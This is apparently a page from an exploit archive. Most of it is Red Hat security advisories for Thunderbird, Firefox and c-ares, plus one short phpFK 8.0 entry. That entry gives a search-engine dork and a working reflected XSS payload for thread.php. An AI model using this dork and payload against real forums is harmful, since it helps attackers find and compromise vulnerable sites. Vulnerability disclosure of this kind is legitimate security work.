Red Hat Security Advisory 2023-3567-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.12.0.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2023:3567-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3567  
Issue date:        2023-06-12  
CVE Names:         CVE-2023-34414 CVE-2023-34416   
=====================================================================

1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 9.0  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.9.0) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.12.0.

Security Fix(es):

* Mozilla: Click-jacking certificate exceptions through rendering lag  
(CVE-2023-34414)

* Mozilla: Memory safety bugs fixed in Firefox 114 and Firefox ESR 102.12  
(CVE-2023-34416)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2212841 - CVE-2023-34414 Mozilla: Click-jacking certificate exceptions through rendering lag  
2212842 - CVE-2023-34416 Mozilla: Memory safety bugs fixed in Firefox 114 and Firefox ESR 102.12

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.9.0):

Source:  
thunderbird-102.12.0-1.el9_0.src.rpm

aarch64:  
thunderbird-102.12.0-1.el9_0.aarch64.rpm  
thunderbird-debuginfo-102.12.0-1.el9_0.aarch64.rpm  
thunderbird-debugsource-102.12.0-1.el9_0.aarch64.rpm

ppc64le:  
thunderbird-102.12.0-1.el9_0.ppc64le.rpm  
thunderbird-debuginfo-102.12.0-1.el9_0.ppc64le.rpm  
thunderbird-debugsource-102.12.0-1.el9_0.ppc64le.rpm

s390x:  
thunderbird-102.12.0-1.el9_0.s390x.rpm  
thunderbird-debuginfo-102.12.0-1.el9_0.s390x.rpm  
thunderbird-debugsource-102.12.0-1.el9_0.s390x.rpm

x86_64:  
thunderbird-102.12.0-1.el9_0.x86_64.rpm  
thunderbird-debuginfo-102.12.0-1.el9_0.x86_64.rpm  
thunderbird-debugsource-102.12.0-1.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-34414  
https://access.redhat.com/security/cve/CVE-2023-34416  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZIlEuNzjgjWX9erEAQiQcg/+IT1nZejMB+ukH3RWExCdAqWWbL7017cI  
uAx4lDFK8TmAWfdHpPuj9+H2oDDjmErTsgtUOFw/dd1TQ5AM2tqG1XR0E8q1+hMf  
XZ/XGUiU+GQBV52+i2XxWhhVeCMKUnLj5aBZ6qieR+zJk6Aanpacel0JZaKKBnNw  
NnGf839A+sXqrOowDH+0FLLapdZRkH9TTu71cIwpTQ4Or3/rdheMsivvYLa8VFfi  
DnifXRPVXQnwMj3Qtfh7iIKhonhpWQdP25px+DTZKT9f5arGKul7lRUdz51mvw5N  
V7FFR+W8nveEDU9vqI8ufWiA1hLNuttbi8tZFypWk1XYfz52wS3z6Y3JjfYNlTlX  
LkoTGRv+bkbMPs4rE6OGjsPQG0Q46kfRPsACY9YfqcapY1HCLMVUyKg5YRUQIQE6  
UorZmt8TRPGe5BUXfv+FNnq95xUnbSXirgs4ESuIVlAUcoYZwS+xULqub6SGMv7Q  
MaBLABQ11BFC8mXuaIMjo8eM+hiCEdPF7ElPtlUuhTpK95TJU4frqpPK/1rMZSXI  
ZExQFQ4hj5oY/OVMdQryXx9Z+aE/TYmRY1zDrY3I8d4TMoQE6VNSs8EqoiWPt0NG  
5DnJX1ecVBo0tpae5f1zkipOX/sb823RxG9GYiYXacg0jKYTlkyqkorw0bfgugd5  
48iIm9okXQQ=  
=J2rs  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3567-01

Red Hat Security Advisory 2023-3560-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 102.12.0 ESR.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2023:3560-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3560  
Issue date:        2023-06-12  
CVE Names:         CVE-2023-34414 CVE-2023-34416   
=====================================================================

1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 8.6  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.8.6) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 102.12.0 ESR.

Security Fix(es):

* Mozilla: Click-jacking certificate exceptions through rendering lag  
(CVE-2023-34414)

* Mozilla: Memory safety bugs fixed in Firefox 114 and Firefox ESR 102.12  
(CVE-2023-34416)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2212841 - CVE-2023-34414 Mozilla: Click-jacking certificate exceptions through rendering lag  
2212842 - CVE-2023-34416 Mozilla: Memory safety bugs fixed in Firefox 114 and Firefox ESR 102.12

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.6):

Source:  
firefox-102.12.0-1.el8_6.src.rpm

aarch64:  
firefox-102.12.0-1.el8_6.aarch64.rpm  
firefox-debuginfo-102.12.0-1.el8_6.aarch64.rpm  
firefox-debugsource-102.12.0-1.el8_6.aarch64.rpm

ppc64le:  
firefox-102.12.0-1.el8_6.ppc64le.rpm  
firefox-debuginfo-102.12.0-1.el8_6.ppc64le.rpm  
firefox-debugsource-102.12.0-1.el8_6.ppc64le.rpm

s390x:  
firefox-102.12.0-1.el8_6.s390x.rpm  
firefox-debuginfo-102.12.0-1.el8_6.s390x.rpm  
firefox-debugsource-102.12.0-1.el8_6.s390x.rpm

x86_64:  
firefox-102.12.0-1.el8_6.x86_64.rpm  
firefox-debuginfo-102.12.0-1.el8_6.x86_64.rpm  
firefox-debugsource-102.12.0-1.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-34414  
https://access.redhat.com/security/cve/CVE-2023-34416  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZIlEuNzjgjWX9erEAQianw/+NJjYjUGQRtwJrAtva8U30vO0pFLiUTMn  
1SDAu+7y1SrZzl4VPsbMfxFI3ySigT2WgzSJ69uO3PaJSE71PMj5o5NCIIEqd+S7  
PVB7Hz/4wqOcj5sVW1BCByIy5AUNfhXkZgfkm1j6ds5RMPmXdikV/35b0deVRO7n  
NFQkElo3P7tqUjmC6sqK1jeGOJYso8amqCBPtvW0gwsTlN7OOFa9mKiofouqqfzo  
7wPzAoxSmwRfhi5+hmuoKHROD5+0Fh8UBBQnBVwUKkzemuXJr+142mOTTwMMGhKV  
JWPpD7XegscW2qjn6m4iOAliVkynhPZer1YmlsKLYcCQHXidDmL60E+gA2t/YG+E  
D5nB+1SKZZnvkVwi8aXPNdcM8/edyVKxDrztUvxdCUo6Y9buv10BWqgvQKxtxcHt  
8UAl1Bl2h8QbccCI5ZuBrkUz8qSB3hCdMDfcnDU1yK3A/4k2PpEO14AzqZh0E8gQ  
0zq7qg9RMrwOy+ylYR4Bn6p5ThzgjBFcY8p/vImgww6ZNURc/llL3MIbuIS6w9OA  
Fm5qdVr6o3vRP0skJtRou3uFBXyxTmCemtE4aNo5UMUQA0EkHlnjAdMLSe3EUcSz  
7h1p2mNqE9o0YFza3vQmZXO/nL3a2edVD/l0BfHFpoaRAo8OntnJna5Ihsiv5CDT  
WmUMvyvGE20=  
=kLDb  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3560-01

phpFK version 8.0 suffers from a cross site scripting vulnerability.

**phpFK 8.0 Cross Site Scripting**

Posted Jun 15, 2023

Authored by indoushka

phpFK version 8.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 485c60ad53bb4abb98ff8bd8586f25cee5d5a57abf5f55c1615b45b7b607c8e0

Download | Favorite | View

**phpFK 8.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : phpFK v8.0 version XSS Vulnerability                                                                               || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit)                                               | | # Vendor    : https://www.frank-karau.de/demo-forum/                                                                             |  | # Dork      : Powered by: phpFK                                                                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /forum/thread.php?board=4&thema=349'"><svg/onload=prompt(/_indoushka_/);>{{7*7}}[+] http://127.0.0.1/forum/thread.php?board=4&thema=349%27%22%3E%3Csvg/onload=prompt(/_indoushka_/);%3E{{7*7}}Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,379)
*   Arbitrary (16,086)
*   BBS (2,859)
*   Bypass (1,697)
*   CGI (1,024)
*   Code Execution (7,179)
*   Conference (678)
*   Cracker (841)
*   CSRF (3,321)
*   DoS (23,204)
*   Encryption (2,363)
*   Exploit (51,247)
*   File Inclusion (4,196)
*   File Upload (956)
*   Firewall (821)
*   Info Disclosure (2,722)
*   Intrusion Detection (885)
*   Java (3,003)
*   JavaScript (842)
*   Kernel (6,586)
*   Local (14,394)
*   Magazine (586)
*   Overflow (12,621)
*   Perl (1,423)
*   PHP (5,129)
*   Proof of Concept (2,335)
*   Protocol (3,567)
*   Python (1,510)
*   Remote (30,539)
*   Root (3,567)
*   Rootkit (506)
*   Ruby (609)
*   Scanner (1,633)
*   Security Tool (7,856)
*   Shell (3,165)
*   Shellcode (1,211)
*   Sniffer (893)
*   Spoof (2,189)
*   SQL Injection (16,237)
*   TCP (2,395)
*   Trojan (687)
*   UDP (884)
*   Virus (664)
*   Vulnerability (31,601)
*   Web (9,579)
*   Whitepaper (3,745)
*   x86 (961)
*   XSS (17,701)
*   Other

**File Archives**

*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,980)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,921)
*   Debian (6,762)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,321)
*   HPUX (879)
*   iOS (345)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (45,894)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (482)
*   RedHat (13,380)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,666)
*   UNIX (9,249)
*   UnixWare (186)
*   Windows (6,558)
*   Other

phpFK 8.0 Cross Site Scripting

Red Hat Security Advisory 2023-3566-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.12.0.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2023:3566-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3566  
Issue date:        2023-06-12  
CVE Names:         CVE-2023-34414 CVE-2023-34416   
=====================================================================

1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 8.6  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.8.6) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.12.0.

Security Fix(es):

* Mozilla: Click-jacking certificate exceptions through rendering lag  
(CVE-2023-34414)

* Mozilla: Memory safety bugs fixed in Firefox 114 and Firefox ESR 102.12  
(CVE-2023-34416)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2212841 - CVE-2023-34414 Mozilla: Click-jacking certificate exceptions through rendering lag  
2212842 - CVE-2023-34416 Mozilla: Memory safety bugs fixed in Firefox 114 and Firefox ESR 102.12

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.6):

Source:  
thunderbird-102.12.0-1.el8_6.src.rpm

aarch64:  
thunderbird-102.12.0-1.el8_6.aarch64.rpm  
thunderbird-debuginfo-102.12.0-1.el8_6.aarch64.rpm  
thunderbird-debugsource-102.12.0-1.el8_6.aarch64.rpm

ppc64le:  
thunderbird-102.12.0-1.el8_6.ppc64le.rpm  
thunderbird-debuginfo-102.12.0-1.el8_6.ppc64le.rpm  
thunderbird-debugsource-102.12.0-1.el8_6.ppc64le.rpm

s390x:  
thunderbird-102.12.0-1.el8_6.s390x.rpm  
thunderbird-debuginfo-102.12.0-1.el8_6.s390x.rpm  
thunderbird-debugsource-102.12.0-1.el8_6.s390x.rpm

x86_64:  
thunderbird-102.12.0-1.el8_6.x86_64.rpm  
thunderbird-debuginfo-102.12.0-1.el8_6.x86_64.rpm  
thunderbird-debugsource-102.12.0-1.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-34414  
https://access.redhat.com/security/cve/CVE-2023-34416  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZIlEnNzjgjWX9erEAQgNSw//XrXETd/beU61eyTR7saLUt0Y3E94AdLg  
wTCewFuYxf/fjRbDQKw5BaZ1rVIsxUXVX/bZv1xzIgxHaWaOSZNgq3F3jEZF1l5V  
6jlut+oE9pYfg8nz6LPvElnl1wMGJp0iv2hMuruCUoZ+83/jB2fODfNhqbX2BSwR  
gLQD9oP4hMIw3gXYy2dOds5YDP4vWWrgFYQrZhnhQ5lIGwNpf97HGcZJ1bkquUz6  
YhJ7io7Abe+1//MB5EuCxhaYtPSKEXuolLWzMWuima3fdac5dFQdO75KZIrUxBK/  
NMXCQihRS9IyDJP+MK+PL9KRqtc4XROfqNltmwD+ej/u5Lp83L7NPLvKLcFlt4vX  
NQlh26C9iX/VFaBLk8NmC2sEcEloGoSsiWMVXyGd8K7/V4dmkzM1ogWkBYiWs8Qp  
4a12plO8PgPQJ9JM7HLsxqaVjR0Ms+aL17YXEfOv44ZtuGNKLaBQzAgvYtZqlPZf  
8oSPdo8wnO6m2ZCW51SFVZAyIw4ltmvGssh2xuqjRwRjrRf5+dqAATPe+koeQJs2  
ReL37h/smQucK8cpRYldZt8IoEMJYchWa1t7P6bL1f7hhbJIZmPiPWiq9mUYdXXS  
n6FGvN8+7u3yCtqOEWJ5uF3UWTD5/e+raiKV1UM8vM9fdAk39PRMzjbMNMVoME9N  
8w2oPiU3xMo=  
=4v57  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3566-01

Red Hat Security Advisory 2023-3559-01 - The c-ares C library defines asynchronous DNS requests and provides name resolving API. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: c-ares security update  
Advisory ID:       RHSA-2023:3559-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3559  
Issue date:        2023-06-12  
CVE Names:         CVE-2023-32067   
=====================================================================

1. Summary:

An update for c-ares is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

The c-ares C library defines asynchronous DNS (Domain Name System) requests  
and provides name resolving API.

Security Fix(es):

* c-ares: 0-byte UDP payload Denial of Service (CVE-2023-32067)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2209502 - CVE-2023-32067 c-ares: 0-byte UDP payload Denial of Service

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

aarch64:  
c-ares-debuginfo-1.17.1-5.el9_2.1.aarch64.rpm  
c-ares-debugsource-1.17.1-5.el9_2.1.aarch64.rpm  
c-ares-devel-1.17.1-5.el9_2.1.aarch64.rpm

ppc64le:  
c-ares-debuginfo-1.17.1-5.el9_2.1.ppc64le.rpm  
c-ares-debugsource-1.17.1-5.el9_2.1.ppc64le.rpm  
c-ares-devel-1.17.1-5.el9_2.1.ppc64le.rpm

s390x:  
c-ares-debuginfo-1.17.1-5.el9_2.1.s390x.rpm  
c-ares-debugsource-1.17.1-5.el9_2.1.s390x.rpm  
c-ares-devel-1.17.1-5.el9_2.1.s390x.rpm

x86_64:  
c-ares-debuginfo-1.17.1-5.el9_2.1.i686.rpm  
c-ares-debuginfo-1.17.1-5.el9_2.1.x86_64.rpm  
c-ares-debugsource-1.17.1-5.el9_2.1.i686.rpm  
c-ares-debugsource-1.17.1-5.el9_2.1.x86_64.rpm  
c-ares-devel-1.17.1-5.el9_2.1.i686.rpm  
c-ares-devel-1.17.1-5.el9_2.1.x86_64.rpm

Red Hat Enterprise Linux BaseOS (v. 9):

Source:  
c-ares-1.17.1-5.el9_2.1.src.rpm

aarch64:  
c-ares-1.17.1-5.el9_2.1.aarch64.rpm  
c-ares-debuginfo-1.17.1-5.el9_2.1.aarch64.rpm  
c-ares-debugsource-1.17.1-5.el9_2.1.aarch64.rpm

ppc64le:  
c-ares-1.17.1-5.el9_2.1.ppc64le.rpm  
c-ares-debuginfo-1.17.1-5.el9_2.1.ppc64le.rpm  
c-ares-debugsource-1.17.1-5.el9_2.1.ppc64le.rpm

s390x:  
c-ares-1.17.1-5.el9_2.1.s390x.rpm  
c-ares-debuginfo-1.17.1-5.el9_2.1.s390x.rpm  
c-ares-debugsource-1.17.1-5.el9_2.1.s390x.rpm

x86_64:  
c-ares-1.17.1-5.el9_2.1.i686.rpm  
c-ares-1.17.1-5.el9_2.1.x86_64.rpm  
c-ares-debuginfo-1.17.1-5.el9_2.1.i686.rpm  
c-ares-debuginfo-1.17.1-5.el9_2.1.x86_64.rpm  
c-ares-debugsource-1.17.1-5.el9_2.1.i686.rpm  
c-ares-debugsource-1.17.1-5.el9_2.1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-32067  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZIlEl9zjgjWX9erEAQgEBhAAkund0vpNV0kmQSFqGBzoDRRYym9wxBzw  
XHaV6MsZL0dH01/z35Y4RLcU0S+h6BJT2HDZIznpGd7Vom0gyike6J39fNjmjgEX  
cwf6jH7cJGSw2o8mfvI6mvRZGbv6FDkNvkyBrOznBDn1oJ+PaQIGeQpYVibk8eSn  
TDmvATxIqYO5po3bU+Tgv3QMtsM4rub++7pjJvASbbMZ8QeYPmgyL8jKR9z820rg  
y3h6K6DAvIt4Bh8MVhUNa1kKP1ZUQkCuReH0qp314o5n5W81WksjSsGx9At3dXIi  
6FOvDnRcoCkfAo0+Cv35eLX6AR8YMToMmaZ42B9MXmEZlGKtRPrTXyg0v6Dn+p30  
GWC+RytIf+s+s1l2KL0aEb8oni/aFY7keqlPfH5Ob1uGm5WbG/tnqr9Hhfu1BbtP  
th6Yo8Q/LlEtRSYuO9A4Mq7e+3RVx9nsd7uIJ6GtNDcddDflU5BIVNnwYno9b0N1  
QaljJXhFxzgJfO2BtH8/ahPdvhK+Y5UE2Fjbuj3JUCltUNhQEId3vJWf0hnw1NWa  
7dBWGDaicDmCseLTpDFUDAHlNyDAN4gBQfDUaJ6rNFO3PdKCL419Nkcq1+JEB3e/  
0IRiP95IPI9lu9JnhUGF977IDH6LIcJ/iCDM/jgQifZdCDTSBPEjI4sYArtRYEdS  
AhqlYGP90io=  
=SLSY  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3559-01

Red Hat Security Advisory 2023-3565-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.12.0.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2023:3565-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3565  
Issue date:        2023-06-12  
CVE Names:         CVE-2023-34414 CVE-2023-34416   
=====================================================================

1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 8.2  
Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications  
Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP  
Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream AUS (v. 8.2) - aarch64, ppc64le, x86_64  
Red Hat Enterprise Linux AppStream E4S (v. 8.2) - aarch64, ppc64le, x86_64  
Red Hat Enterprise Linux AppStream TUS (v. 8.2) - aarch64, ppc64le, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.12.0.

Security Fix(es):

* Mozilla: Click-jacking certificate exceptions through rendering lag  
(CVE-2023-34414)

* Mozilla: Memory safety bugs fixed in Firefox 114 and Firefox ESR 102.12  
(CVE-2023-34416)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2212841 - CVE-2023-34414 Mozilla: Click-jacking certificate exceptions through rendering lag  
2212842 - CVE-2023-34416 Mozilla: Memory safety bugs fixed in Firefox 114 and Firefox ESR 102.12

6. Package List:

Red Hat Enterprise Linux AppStream AUS (v. 8.2):

Source:  
thunderbird-102.12.0-1.el8_2.src.rpm

aarch64:  
thunderbird-102.12.0-1.el8_2.aarch64.rpm  
thunderbird-debuginfo-102.12.0-1.el8_2.aarch64.rpm  
thunderbird-debugsource-102.12.0-1.el8_2.aarch64.rpm

ppc64le:  
thunderbird-102.12.0-1.el8_2.ppc64le.rpm  
thunderbird-debuginfo-102.12.0-1.el8_2.ppc64le.rpm  
thunderbird-debugsource-102.12.0-1.el8_2.ppc64le.rpm

x86_64:  
thunderbird-102.12.0-1.el8_2.x86_64.rpm  
thunderbird-debuginfo-102.12.0-1.el8_2.x86_64.rpm  
thunderbird-debugsource-102.12.0-1.el8_2.x86_64.rpm

Red Hat Enterprise Linux AppStream E4S (v. 8.2):

Source:  
thunderbird-102.12.0-1.el8_2.src.rpm

aarch64:  
thunderbird-102.12.0-1.el8_2.aarch64.rpm  
thunderbird-debuginfo-102.12.0-1.el8_2.aarch64.rpm  
thunderbird-debugsource-102.12.0-1.el8_2.aarch64.rpm

ppc64le:  
thunderbird-102.12.0-1.el8_2.ppc64le.rpm  
thunderbird-debuginfo-102.12.0-1.el8_2.ppc64le.rpm  
thunderbird-debugsource-102.12.0-1.el8_2.ppc64le.rpm

x86_64:  
thunderbird-102.12.0-1.el8_2.x86_64.rpm  
thunderbird-debuginfo-102.12.0-1.el8_2.x86_64.rpm  
thunderbird-debugsource-102.12.0-1.el8_2.x86_64.rpm

Red Hat Enterprise Linux AppStream TUS (v. 8.2):

Source:  
thunderbird-102.12.0-1.el8_2.src.rpm

aarch64:  
thunderbird-102.12.0-1.el8_2.aarch64.rpm  
thunderbird-debuginfo-102.12.0-1.el8_2.aarch64.rpm  
thunderbird-debugsource-102.12.0-1.el8_2.aarch64.rpm

ppc64le:  
thunderbird-102.12.0-1.el8_2.ppc64le.rpm  
thunderbird-debuginfo-102.12.0-1.el8_2.ppc64le.rpm  
thunderbird-debugsource-102.12.0-1.el8_2.ppc64le.rpm

x86_64:  
thunderbird-102.12.0-1.el8_2.x86_64.rpm  
thunderbird-debuginfo-102.12.0-1.el8_2.x86_64.rpm  
thunderbird-debugsource-102.12.0-1.el8_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-34414  
https://access.redhat.com/security/cve/CVE-2023-34416  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZIlEk9zjgjWX9erEAQiIhA//XFsAGpWoG3HVGDfk5RrXIQ07z8vPDFC8  
Re4usAqE3m+v1CxbRi/5L8zBTtpo7JQXmImIR5+7o+a3YMG6Edgiw0o+tYhtVGaM  
PWSzuhSaR+ah6Rwa9EtnTxWfCSr71fi6AnJQKAV5IehfVYhulppd2okzHWtKp4mv  
KiwfbYInO/hQTajzJ05nSebCzU25KkhDi2ZvoXxb2l+9qtde0L0WCtVll7HeqXkI  
/nW4ex1Rn7bbZmbt9vYktD9+iPikri4+7QDcVmL17Bf5aJ8bKItvqBxyOz9j2Pwk  
ynXNurKagD4BI0eqwF/nDzX1N0FY0Iu8cZJB+N445MbpiUIpp0jVEp2ogNm6dzfV  
yuTgLuzPWQHEtPpD5j5P8Fvwd/XRgJXeanMZVeEoXrCfnLGQe2FR6bdLsUNzl5JP  
i6iCpNpgunkFUXVH0LmTQnAP3JHtLMRPfUA/rDrI5Vfz+/WdshWWV00a+VNIH1vu  
/JpQfpZdK/TM55vse5IRvPBnmdL2Bw9+Vpr2TbWSlVKMbyoEi6OCJ69ftyUAVbzo  
myI4a9b92EuFasfVARmnQAraPaEe/X87Ct5eYp7BFSfnkkhlvefIJ5erY7xXu1Ov  
xI46V207c6eeWNs5k19g16LB2fSORkk13RKED8ztiuv693gf8q35/HLSf1KC7vQX  
qT0uUNcoyZM=  
=SmEz  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3565-01

